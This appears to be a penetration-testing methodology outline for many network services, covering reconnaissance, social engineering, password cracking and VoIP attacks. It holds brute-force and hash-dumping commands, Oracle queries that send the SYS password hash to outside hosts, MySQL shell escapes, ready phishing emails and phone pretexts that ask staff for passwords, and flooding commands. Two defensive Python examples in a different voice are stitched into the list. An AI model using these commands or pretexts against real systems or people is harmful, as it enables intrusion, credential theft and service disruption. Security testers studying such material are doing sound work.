- sqlbf -u hashes.txt -c default.cm -r out.rep (brute-force attack)
- SQL Dict
- SQLAT
- Hydra
- SQLlhf
- ForceSQL
- Citrix port 1494 open
- Citrix Enumeration
- Default Domain
- Published Applications
- ./citrix-pa-scan {IP_address/file | - | random} [timeout]
- citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
- Citrix Brute Force
- bforce.js
- connect.js
- Citrix Brute-forcer
- Reference Material
- Hacking Citrix - the legitimate backdoor
- Hacking Citrix - the forceful way
- Oracle Port 1521 Open
- Oracle Enumeration
- oracsec
- Repscan
- Sidguess
- Scuba
- DNS/HTTP Enumeration
- SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
- SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
- WinSID
- Oracle default password list
- TNSVer
- tnsver host [port]
- TCP Scan
- Oracle TNSLSNR
- Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
- TNSCmd
- perl tnscmd.pl -h ip_address
- perl tnscmd.pl version -h ip_address
- perl tnscmd.pl status -h ip_address
- perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
- LSNrCheck
- Oracle Security Check (needs credentials)
- OAT
- sh opwg.sh -s ip_address
- opwg.bat -s ip_address
- sh oquery.sh -s ip_address -u username -p password -d SID
- OR c:\oquery -s ip_address -u username -p password -d SID
- OScanner
- sh oscanner.sh -s ip_address
- oscanner.exe -s ip_address
- sh reportviewer.sh oscanner_saved_file.xml
- reportviewer.exe oscanner_saved_file.xml
- NGS Squirrel for Oracle
- Service Register
- Service-register.exe ip_address
- PLSQL Scanner 2008
- Oracle Brute Force
- OAK
- ora-getsid hostname port sid_dictionary_list
- ora-auth-alter-session host port sid username password sql
- ora-brutesid host port start
- ora-pwdbrute host port sid username password-file
- ora-userenum host port sid userlistfile
- ora-ver -e (-f -l -a) host port
- breakable (Targets Application Server Port)
- breakable.exe host url [port] [v]
- host: ip_address of the Oracle Portal Server
- url: PATH_INFO, i.e. /pls/orasso
- port: TCP port the Oracle Portal Server is serving pages from
- v: verbose
- SQLInjector (Targets Application Server Port)
- sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
- sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
- Check Password
- orabf
- orabf [hash]:[username] [options]
- thc-orakel
- Cracker Client Crypto
- DBVisualisor
- SQL scripts from pentest.co.uk
- Manual SQL input of previously reported vulnerabilities
- Oracle Reference Material
- Understanding SQL Injection
- SQL Injection walkthrough
- SQL Injection by example
- Advanced SQL Injection in Oracle databases
- Blind SQL Injection
- SQL Cheatsheets
- NFS Port 2049 open
- NFS Enumeration
- showmount -e hostname/ip_address
- mount -t nfs ip_address:/directory_found_exported /local_mount_point
- NFS Brute Force
- Interact with NFS share and try to add/delete
- Exploit and Confuse Unix
- Examine Configuration Files
- /etc/exports /etc/lib/nfs/xtab
- Compaq/HP Insight Manager Port 2301, 2381 open
- HP Enumeration
- Authentication Method
- Host OS Authentication
- Default Authentication
- Default Passwords
- Wikto
- Nstealth
- HP Bruteforce
- Hydra Acunetix
- Examine Configuration Files
- path.properties mx.log CLIClientConfig.cfg database.props pg_hba.conf jboss-service.xml .namazurc
- MySQL port 3306 open
- Enumeration
- nmap -A -n -p3306 <IP Address>
- nmap -A -n -PN --script=all -p3306 <IP Address>
- telnet IP_Address 3306
- use test; select * from test;
- To check for other DBs: show databases
- Administration
- MySQL Network Scanner
- MySQL GUI Tools
- mysqlshow
- mysqlbinlog
- Manual Checks
- Default usernames and passwords
- username: root, password: testing
- mysql -h <Hostname> -u root
- mysql -h <Hostname> -u root@localhost
- mysql -h <Hostname>
- mysql -h <Hostname> -u ""@localhost
- Configuration Files
- Operating System
- windows
- config.ini
- my.ini
- \windows\my.ini
- \winnt\my.ini
- <InstDir>/mysql/data/
- unix
- my.cnf
- /etc/my.cnf /etc/mysql/my.cnf /var/lib/mysql/my.cnf ~/.my.cnf /etc/my.cnf
- Command History
- ~/.mysql.history
- Log Files
- connections.log
- update.log
- common.log
- To run many SQL commands at once: mysql -u username -p < manycommands.sql
- MySQL data directory (location specified in my.cnf)
- Parent dir = data directory
- mysql
- test
- information_schema (key information in MySQL)
- Complete table list: select table_schema,table_name from tables;
- Exact privileges: select grantee, table_schema, privilege_type FROM schema_privileges;
- File privileges: select user,file_priv from mysql.user where user='root';
- Version: select version();
- Load a specific file: SELECT LOAD_FILE('FILENAME');
- SSL Check
- mysql> show variables like 'have_openssl';
- If no rows are returned at all, the distribution itself doesn't support SSL connections and probably needs to be recompiled. If the value is DISABLED, the service simply wasn't started with SSL, which can be easily fixed.
- Privilege Escalation
- Current Level of access
- mysql> select user();
- mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
- Access passwords
- mysql> use mysql
- mysql> select user,password from user;
- Create a new user and grant him privileges
- mysql> create user test identified by 'test';
- mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
- Break into a shell
- mysql> \! cat /etc/passwd
- mysql> \! bash
- SQL injection
- mysql-miner.pl
- mysql-miner.pl http://target/ expected_string database
- http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
- http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
- References.
- Design Weaknesses
- MySQL running as root
- Exposed publicly on Internet
- http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
- http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
- RDesktop port 3389 open
- Rdesktop Enumeration
- Remote Desktop Connection
- Rdesktop Bruteforce
- TSGrinder
- tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
- Tscrack
- Sybase Port 5000+ open
- Sybase Enumeration
- sybase-version ip_address from NGS
- Sybase Vulnerability Assessment
- Use DBVisualiser
- Sybase Security checksheet
- Copy output into excel spreadsheet Evaluate mis-configured parameters
- Manual SQL input of previously reported vulnerabilities
- Advanced SQL Injection in SQL Server
- More Advanced SQL Injection
- NGS Squirrel for Sybase
- SIP Port 5060 open
- SIP Enumeration
- netcat
- nc IP_Address Port
- sipflanker
- python sipflanker.py 192.168.1-254
- Sipscan
- smap
- smap IP_Address/Subnet_Mask
- smap -o IP_Address/Subnet_Mask
- smap -l IP_Address
- SIP Packet Crafting etc.
- sipsak
- Tracing paths: sipsak -T -s sip:username@domain
- Options request: sipsak -vv -s sip:username@domain
- Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain
- siprogue
- SIP Vulnerability Scanning/ Brute Force
- tftp bruteforcer
- Default dictionary file ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
- VoIPaudit
- SiVuS
- Examine Configuration Files
- SIPDefault.cnf asterisk.conf sip.conf phone.conf sip_notify.conf <Ethernet address>.cfg 000000000000.cfg phone1.cfg sip.cfg etc. etc.
- VNC port 5900^ open
- VNC Enumeration
- Scans
- 5900^ for direct access. 5800 for HTTP access.
- VNC Brute Force
- Password Attacks
- Remote
- Password Guess
- vncrack
- Password Crack
- vncrack
- Packet Capture
- Phoss http://www.phenoelit.de/phoss
- Local
- Registry Locations
- HKEY_CURRENT_USER\Software\ORL\WinVNC3
- HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
- Decryption Key
- 0x238210763578887
- Examine Configuration Files
- .vnc /etc/vnc/config $HOME/.vnc/config /etc/sysconfig/vncservers /etc/vnc.conf
- X11 port 6000^ open
- X11 Enumeration
- List open windows
- Authentication Method
- Xauth
- Xhost
- X11 Exploitation
- xwd
- xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
- Keystrokes
- Received
- Transmitted
- Screenshots
- xhost +
- Examine Configuration Files
- /etc/Xn.hosts
- /usr/lib/X11/xdm
- Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"
- /usr/lib/X11/xdm/xsession
- /usr/lib/X11/xdm/xsession-remote
- /usr/lib/X11/xdm/xsession.0
- /usr/lib/X11/xdm/xdm-config
- DisplayManager*authorize:on
- Tor Port 9001, 9030 open
- Tor Node Checker
- Ip Pages
- Kewlio.net
- nmap NSE script
- Jet Direct 9100 open
- hijetta
Network Footprinting
Network Footprinting (Reconnaissance). The tester attempts to gather as much information as possible about the selected network. Reconnaissance can take two forms, active and passive. A passive approach is always the best starting point, as it would normally defeat intrusion detection systems and the other forms of protection afforded to the network; it usually involves discovering publicly available information using a web browser, newsgroups and similar sources. An active approach is more intrusive, may show up in audit logs, and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
- Whois is widely used for querying authoritative registries/ databases to discover the owner of a domain name, an IP address, or an autonomous system number of the system you are targeting.
- Authoritative Bodies
- IANA - Internet Assigned Numbers Authority
- ICANN - Internet Corporation for Assigned Names and Numbers
- NRO - Number Resource Organisation
- RIR - Regional Internet Registry
- AFRINIC - African Network Information Centre
- APNIC - Asia Pacific Network Information Centre
- National Internet Registry
- APJII CNNIC JPNIC KRNIC TWNIC VNNIC
- ARIN - American Registry for Internet Numbers
- LACNIC - Latin America & Caribbean Network Information Centre
- RIPE - Réseaux IP Européens Network Coordination Centre
- Websites
- Central Ops
- Domain Dossier Email Dossier
- DNS Stuff
- Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
- Fixed Orbit
- Autonomous System lookups and other online tools available.
- Geektools
- IP2Location
- Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
- Kartoo
- Metasearch engine that visually presents its results.
- MyIPNeighbors.com
- Excellent site that gives details of the domains sharing the IP queried and, conversely, IP to DNS resolution
- Netcraft
- Online search tool allowing queries for host information.
- Robtex
- Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed. Note: - Can be unreliable with old entries (Use CentralOps to verify)
- Traceroute.org
- Website listing a large number links to online traceroute resources.
- Wayback Machine
- Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
- Whois.net
- Tools
- Cheops-ng
- Country whois
- Domain Research Tool
- Firefox Plugins
- AS Number
- Shazou
- Firecat Suite
- Gnetutil
- Goolag Scanner
- Greenwich
- Maltego
- GTWhois
- Sam Spade
- Smart whois
- SpiderFoot
- Internet Search
- General Information
- Web Investigator
- Tracesmart
- Friends Reunited
- Ebay - profiles etc.
- Financial
- EDGAR - Company information, including real-time filings. US
- Google Finance - General Finance Portal
- Hoovers - Business Intelligence, Insight and Results. US and UK
- Companies House UK
- Land Registry UK
- Phone book/ Electoral Roll Information
- 123people
- http://www.123people.co.uk/s/firstname+lastname/world
- 192.com
- Electoral Roll Search. UK
- 411
- Online White Pages and Yellow Pages. US
- Abika
- Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
- BT.com. UK
- Residential
- Business
- Pipl
- http://pipl.com/search/?FirstName=????&LastName=????&City=&State=&Country=UK&CategoryID=2&Interface=1
- http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
- http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
- Spokeo
- http://www.spokeo.com/user?q=domain_name http://www.spokeo.com/user?q=email_address
- Yasni
- http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
- Zabasearch
- People Search Engine. US
- Generic Web Searching
- Code Search, Forum Entries, Google Hacking Database, Google
- Back end files
- .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
- Email Addresses, Contact Details
- Newsgroups/forums, Blog Search
- Yammer, Google Blog Search
- http://blogsearch.google.com/blogsearch?hl=en&ie=UTF-8&q=????&btnG=Search+Blogs
- Technorati
- http://technorati.com/search/[query]?language=n
- Jaiku, Present.ly, Twitter, Network Browser
- Search Engine Comparison/ Aggregator Sites
- Clusty
- http://clusty.com/search?input-form=clusty-simple&v%3Asources=webplus&query=????
- Grokker
- http://live.grokker.com/grokker.html?query=?????&OpenSearch_Yahoo=true&Wikipedia=true&numResults=250
- Zuula
- http://www.zuula.com/SearchResult.jsp?bst=1&prefpg=1&st=????&x=0&y=0
- Exalead
- http://www.exalead.co.uk/search/results?q=????&x=0&y=0&%24mode=allweb&%24searchlanguages=en
- Delicious
- http://delicious.com/search?p=?????&u=&chk=&context=&fr=del_icio_us&lc=0
- Metadata Search
- Metadata can be found within various file formats; the more file types that are inspected, the more metadata can be extracted. Example metadata that can be extracted includes valid usernames, directory structures etc., which makes the review of documents, images etc. relating to the target domain a valuable source of information.
- MetaData Visualisation Sites
- TouchGraph Google Browser, Kartoo
- Tools
- Bashitsu
- svn checkout http://bashitsu.googlecode.com/svn/trunk/
- cat filename | strings | bashitsu-extract-names
- Bintext
- Exif Tool
- exiftool -common directory
- exiftool -r -w .txt -common directory
- FOCA
- Online Version, Offline
- Hachoir
- Infocrobes
- Libextractor
- extract -b filename
- extract filename
- extract -B country_code filename
- Metadata Extraction Tool
- extract.bat <arg1> <arg2> <arg3>
- Metagoofil
- metagoofil -d target_domain -l max_no_of_files -f all (or pdf,doc,xls,ppt) -o output_file.html -t directory_to_download_files_to
- OOMetaExtractor
- The Revisionist
- ./therev '' @/directory
- ./therev '' site.com
- ./therev 'linux' microsoft.com
- enWvware
- Wikipedia Metadata Search
- Wikiscanner, Wikipedia username checker
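The usernames and paths that the metadata tools above harvest are exactly what a defender should strip before documents are published. The following is an added example, not code from the page or from any of the tools it lists: a small offline check that reads the core properties of an OOXML package (docx/xlsx/pptx) and the Info dictionary of a PDF, then flags values that look like account names. The sample documents are constructed in memory; the `build_sample_docx` helper and the `leaked_identities` heuristic are this example's own, not part of any standard.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by docProps/core.xml inside OOXML packages (.docx/.xlsx/.pptx).
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
CORE_FIELDS = ("dc:creator", "cp:lastModifiedBy", "dc:title", "dc:description")
PDF_FIELDS = ("Author", "Creator", "Producer", "Title")


def ooxml_metadata(data):
    """Return creator, lastModifiedBy, title, description from an OOXML package."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        if "docProps/core.xml" not in pkg.namelist():
            return found
        root = ET.fromstring(pkg.read("docProps/core.xml"))
        for field in CORE_FIELDS:
            node = root.find(field, NS)
            if node is not None and node.text:
                found[field.split(":")[1]] = node.text
    return found


def pdf_metadata(data):
    """Return Author/Creator/Producer/Title from a PDF Info dictionary.
    Only literal '(...)' strings are handled; hex strings and encrypted
    documents would need a real PDF parser."""
    found = {}
    for field in PDF_FIELDS:
        match = re.search(rb"/" + field.encode() + rb"\s*\(([^)]*)\)", data)
        if match:
            found[field] = match.group(1).decode("latin-1")
    return found


def leaked_identities(meta):
    """Heuristic (this example's own): values shaped like DOMAIN\\user or a bare login."""
    leaks = []
    for key in ("creator", "lastModifiedBy", "Author"):
        value = meta.get(key, "")
        if re.fullmatch(r"(?:[A-Za-z0-9_-]+\\)?[a-z][a-z0-9._-]{2,}", value):
            leaks.append(value)
    return leaks


def scan_document(data):
    """Dispatch on the file signature and return (metadata, leaked identities)."""
    if data.startswith(b"PK"):
        meta = ooxml_metadata(data)
    elif data.startswith(b"%PDF"):
        meta = pdf_metadata(data)
    else:
        meta = {}
    return meta, leaked_identities(meta)


def build_sample_docx(creator, modified_by):
    """Constructed .docx package containing only the parts this check reads."""
    core = (
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        "<dc:creator>%s</dc:creator><cp:lastModifiedBy>%s</cp:lastModifiedBy>"
        "<dc:title>Quarterly report</dc:title></cp:coreProperties>"
    ) % (NS["cp"], NS["dc"], creator, modified_by)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("docProps/core.xml", core)
    return buf.getvalue()


# Constructed PDF fragment: just enough of an Info dictionary to be scanned.
SAMPLE_PDF = (
    b"%PDF-1.4\n1 0 obj\n<< /Author (jsmith) /Creator (Microsoft Word)"
    b" /Producer (Acrobat Distiller 9.0) /Title (Internal network diagram) >>\n"
    b"endobj\n%%EOF\n"
)

if __name__ == "__main__":
    for name, blob in (("report.docx", build_sample_docx("CORP\\jsmith", "a.lee")),
                       ("diagram.pdf", SAMPLE_PDF)):
        meta, leaks = scan_document(blob)
        print(name, meta, "LEAKS:" if leaks else "clean", leaks)
```

Run over a publication directory, the same `scan_document` call gives a pre-release gate: anything returned in the leak list is a username (and often a domain name) that would otherwise be available to a metagoofil-style collector.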
- Social/ Business Networks
- The following sites are some of the many social and business networking entities in use today. Depending on the interests of the people you are researching, it may be worth exploring only the sites for which they have a particular penchant, based on prior knowledge from open source research, company biographies etc., i.e. Buzznet if they are interested in music/ pop culture, Flixter for movies etc.
- Finding a person's particular interests may make a potential client side attack more successful if you can find a related "hook" in any potential "spoofed" email sent for them to click on (a spearphishing technique).
- Note: - This list is not exhaustive and has been limited to those with over 1 million members.
- Africa
- BlackPlanet
- Australia
- Bebo
- Belgium
- Netlog
- Holland
- Hyves
- Hungary
- iWiW
- Iran
- Cloob
- Japan
- Mixi
- Korea
- CyWorld
- Poland
- Grono, Nasza-klasa
- Russia
- Odnoklassniki, Vkontakte
- Sweden
- LunarStorm
- UK
- FriendsReunited et al, Badoo, FaceParty
- US
- Classmates, Facebook, Friendster, MyLife.com (formerly Reunion.com), MySpace, Windows Live Spaces
- Assorted
- Buzznet, Care2, Habbo, Hi5, Linkedin, MocoSpace, Naymz, Orkut, Passado, Tagged, Twitter, Windows Live Spaces, Xanga, Yahoo! 360°, Xing
- Resources
- OSINT, International Directory of Search Engines
- DNS Record Retrieval from publicly available servers
- Types of Information Records
- SOA Records - Indicates the server that has authority for the domain.
- MX Records - List of a host's or domain's mail exchanger server(s).
- NS Records - List of a host's or domain's name server(s).
- A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
- PTR Records - Lists the domain name of a host identified by its IP address (reverse lookup).
- SRV Records - Service location record.
- HINFO Records - Host information record with CPU type and operating system.
- TXT Records - Generic text record.
- CNAME - A host's canonical name allows additional names/ aliases to be used to locate a computer.
- RP - Responsible person for the domain.
- Database Settings
- Version.bind, Serial, Refresh, Retry, Expiry, Minimum
- Sub Domains, Internal IP ranges
- Reverse DNS for IP Range, Zone Transfer
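To see what the record types and SOA settings listed above actually carry on the wire, here is an added example (not code from the page) that builds a DNS response in RFC 1035 wire format and parses it back, including the SOA serial/refresh/retry/expire/minimum fields and name compression pointers. The response is constructed in memory, so no server is queried; the zone, server names and values are made-up sample data.

```python
import struct

TYPES = {1: "A", 2: "NS", 6: "SOA", 15: "MX", 16: "TXT"}


def encode_name(name):
    """'example.com.' -> length-prefixed labels terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg, off):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, end = [], None
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                      # compression pointer
            if end is None:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels) + ".", (end if end is not None else off)


def rr(name, rtype, ttl, rdata):
    """Resource record: NAME, TYPE, CLASS=IN, TTL, RDLENGTH, RDATA."""
    return encode_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata


def soa_rdata(mname, rname, serial, refresh, retry, expire, minimum):
    return (encode_name(mname) + encode_name(rname)
            + struct.pack("!IIIII", serial, refresh, retry, expire, minimum))


def build_response(zone, answers):
    """Constructed response: id 0x1234, flags QR|AA, one SOA question, given answers."""
    header = struct.pack("!HHHHHH", 0x1234, 0x8400, 1, len(answers), 0, 0)
    question = encode_name(zone) + struct.pack("!HH", 6, 1)
    return header + question + b"".join(answers)


def parse_response(msg):
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                                # skip the question section
        _, off = decode_name(msg, off)
        off += 4
    records = []
    for _ in range(an):
        name, off = decode_name(msg, off)
        rtype, _cls, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        rec = {"name": name, "type": TYPES.get(rtype, rtype), "ttl": ttl}
        if rtype == 6:                                 # SOA: two names + five 32-bit fields
            mname, p = decode_name(msg, off)
            rname, p = decode_name(msg, p)
            fields = ("mname", "rname", "serial", "refresh", "retry", "expire", "minimum")
            rec.update(zip(fields, (mname, rname) + struct.unpack("!IIIII", msg[p:p + 20])))
        elif rtype == 1:
            rec["address"] = ".".join(str(b) for b in rdata)
        elif rtype == 15:                              # MX: preference + exchange name
            rec["preference"] = struct.unpack("!H", rdata[:2])[0]
            rec["exchange"], _ = decode_name(msg, off + 2)
        elif rtype == 2:
            rec["nsdname"], _ = decode_name(msg, off)
        off += rdlen
        records.append(rec)
    return {"id": txid, "authoritative": bool(flags & 0x0400), "records": records}


# Constructed sample zone data (not a real domain's records).
SAMPLE = build_response("example.com.", [
    rr("example.com.", 6, 3600, soa_rdata("ns1.example.com.", "hostmaster.example.com.",
                                          2009031501, 7200, 900, 1209600, 300)),
    rr("example.com.", 15, 3600, struct.pack("!H", 10) + encode_name("mail.example.com.")),
    rr("example.com.", 1, 300, bytes([192, 0, 2, 10])),
])

if __name__ == "__main__":
    for rec in parse_response(SAMPLE)["records"]:
        print(rec)
```

The SOA serial is worth recording during an assessment because it changes on every zone edit, and the `rname` field is an email address for the zone's administrator; both are visible to anyone who can query the authoritative server.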
- Social Engineering
- Remote
- Phone
- Scenarios
- IT Department. "Hi, it's Zoe from the helpdesk. I am doing a security audit of the network and I need to re-synchronise the Active Directory usernames and passwords. This is so that your logon process in the morning receives no undue delays." If you are calling from a mobile number, explain that the helpdesk has been issued a mobile phone for 'on call' personnel.
- Results
- Contact Details
- Name, Phone number, Email, Room number, Department, Role
- Scenarios
- Hi there, I am currently carrying out an Active Directory Health Check for TARGET COMPANY and require to re-synchronise some outstanding accounts on behalf of the IT Service Desk. Please reply to me detailing the username and password you use to logon to your desktop in the morning. I have checked with MR JOHN DOE, the IT Security Advisor and he has authorised this request. I will then populate the database with your account details ready for re-synchronisation with Active Directory such that replication of your account will be re-established (this process is transparent to the user and so requires no further action from yourself). We hope that this exercise will reduce the time it takes for some users to logon to the network. Best Regards, Andrew Marks
- Good Morning, The IT Department had a critical failure last night regarding remote access to the corporate network, this will only affect users that occasionally work from home. If you have remote access, please email me with your username and access requirements e.g. what remote access system did you use? VPN and IP address etc, and we will reset the system. We are also using this 'opportunity' to increase the remote access users, so if you believe you need to work from home occasionally, please email me your usernames so I can add them to the correct groups. If you wish to retain your current credentials, also send your password. We do not require your password to carry out the maintenance, but it will change if you do not inform us of it. We apologise for any inconvenience this failure has caused and are working to resolve it as soon as possible. We also thank you for your continued patience and help. Kindest regards, lee, EMAIL SIGNATURE
- Software
- Results
- Contact Details
- Name, Phone number, Email, Room number, Department, Role
- Other
- Local
- Personas
- Name
- Suggest same 1st name.
- Phone
- Give work mobile, but remember they have it!
- Have a suitable email address
- Business Cards
- Get cards printed
- Contact Details
- Name Phone number Email Room number Department Role
- Scenarios
- New IT employee
- New IT employee. "Hi, I'm the new guy in IT and I've been told to do a quick survey of users on the network. They give all the worst jobs to the new guys don't they? Can you help me out on this?" Get the following information, try to put an "any problems with it we can help with?" slant on it: Username; Domain; Remote access (Type - Modem/VPN); Remote email (OWA); Most used software?; Any comments about the network?; Any additional software you would like?; What do you think about the security on the network? Password complexity etc. Now give reasons as to why they have complexity for passwords, try and get someone to give you their password and explain how you can make it more secure. "Thanks very much and you'll see the results on the company boards soon."
- Fire Inspector
- Turning up on the pretext of a snap fire inspection, in line with the local government initiatives on fire safety in the workplace. Ensure you have a suitable appearance - High visibility jacket - Clipboard - ID card (fake). Check for: number of fire extinguishers, pressure, type. Fire exits, accessibility etc. Look for any information you can get. Try to get on your own, without supervision!
- Results
- Maps
- Satellite Imagery
- Google Maps
- Building layouts
- Other
- Dumpster Diving
- Rubbish Bins, Contract Waste Removal, Ebay ex-stock sales i.e. HDD
- Web Site copy
- HTTrack, Teleport Pro, Black Widow
- Password cracking
- Rainbow crack
- ophcrack rainbow tables
- rcrack c:\rainbowcrack\*.rt -f pwfile.txt
- Ophcrack
- Cain & Abel
- John the Ripper
- ./unshadow passwd shadow > file_to_crack
- ./john -single file_to_crack
- ./john -w=location_of_dictionary_file -rules file_to_crack
- ./john -show file_to_crack
- ./john --incremental:All file_to_crack
- fgdump
- fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
- pwdump6
- pwdump [-h][-o][-u][-p] machineName
- medusa
- LCP
- L0phtcrack (Note: - This tool was acquired by Symantec from @Stake and it is their policy not to ship outside the USA and Canada)
- Domain credentials
- Sniffing, pwdump import, sam import
- aiocracker
- aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
- VoIP Security
- Sniffing Tools
- AuthTool, Cain & Abel, Etherpeek, NetDude, Oreka, PSIPDump, SIPomatic, SIPv6 Analyzer, UCSniff, VoiPong, VOMIT, Wireshark, WIST - Web Interface for SIP Trace
- Scanning and Enumeration Tools
- enumIAX, fping, IAX Enumerator, iWar, Nessus, Nmap, SIP Forum Test Framework (SFTF), SIPcrack, sipflanker
- python sipflanker.py 192.168.1-254
- SIP-Scan, SIP.Tastic, SIPVicious, SiVuS, SMAP
- smap IP_Address/Subnet_Mask
- smap -o IP_Address/Subnet_Mask
- smap -l IP_Address
- snmpwalk, VLANping, VoIPAudit, VoIP GHDB Entries, VoIP Voicemail Database
- Packet Creation and Flooding Tools
- H.323 Injection Files, H225regreject, IAXHangup, IAXAuthJack, IAX.Brute, IAXFlooder
- ./iaxflood sourcename destinationname numpackets
- INVITE Flooder
- ./inviteflood interface target_user target_domain ip_address_target no_of_packets
- kphone-ddos, RTP Flooder, rtpbreak, Scapy, Seagull, SIPBomber, SIPNess, SIPp, SIPsak
- Tracing paths: sipsak -T -s sip:username@domain
- Options request: sipsak -vv -s sip:username@domain
- Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain
- SIP-Send-Fun, SIPVicious, Spitter, TFTP Brute Force
- perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
- UDP Flooder
- ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
- UDP Flooder (with VLAN Support)
- ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN_ID no_of_packets
- Voiphopper
- Fuzzing Tools
- Asteroid, Codenomicon VoIP Fuzzers, Fuzzy Packet, Mu Security VoIP Fuzzing Platform, ohrwurm RTP Fuzzer, PROTOS H.323 Fuzzer, PROTOS SIP Fuzzer, SIP Forum Test Framework (SFTF), Sip-Proxy, Spirent ThreatEx
- Signaling Manipulation Tools
- AuthTool
- ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
- BYE Teardown, Check Sync Phone Rebooter, RedirectPoison
- ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
- Registration Adder, Registration Eraser, Registration Hijacker, SIP-Kill, SIP-Proxy-Kill, SIP-RedirectRTP, SipRogue, vnak
- Media Manipulation Tools
- RTP InsertSound
- ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
- RTP MixSound
- ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
- RTPProxy, RTPInject
- Generic Software Suites
- OAT Office Communication Server Tool Assessment, EnableSecurity VOIPPACK
- Note: - Add-on for Immunity Canvas
- References
- URLs
- Common Vulnerabilities and Exploits (CVE)
- Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
- Default Passwords, Hacking Exposed VoIP
- Tool Pre-requisites
- Hack Library, g711conversions
- VoIPsa
- White Papers
- An Analysis of Security Threats and Tools in SIP-Based VoIP Systems; An Analysis of VoIP Security Threats and Tools; Hacking VoIP Exposed; Security testing of SIP implementations; SIP Stack Fingerprinting and Stack Difference Attacks; Two attacks against VoIP; VoIP Attacks!; VoIP Security Audit Program (VSAP)
- Vulnerability Assessment
- Vulnerability Assessment - Utilising vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results would then be analysed to determine if there are any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information; once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released, and the matches are reported to the user. Other tools actually use manual pen testing methods and display the output received, i.e. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.
- Manual
- Patch Levels
- Confirmed Vulnerabilities
- Severe, High, Medium, Low
- Automated
- Reports
- Vulnerabilities
- Severe, High, Medium, Low
- Tools
- GFI, Nessus (Linux), Nessus (Windows), NGS Typhon, NGS Squirrel for Oracle, NGS Squirrel for SQL, SARA, MatriXay, BiDiBlah, SSA, Oval Interpreter, Xscan, Security Manager +, Inguma
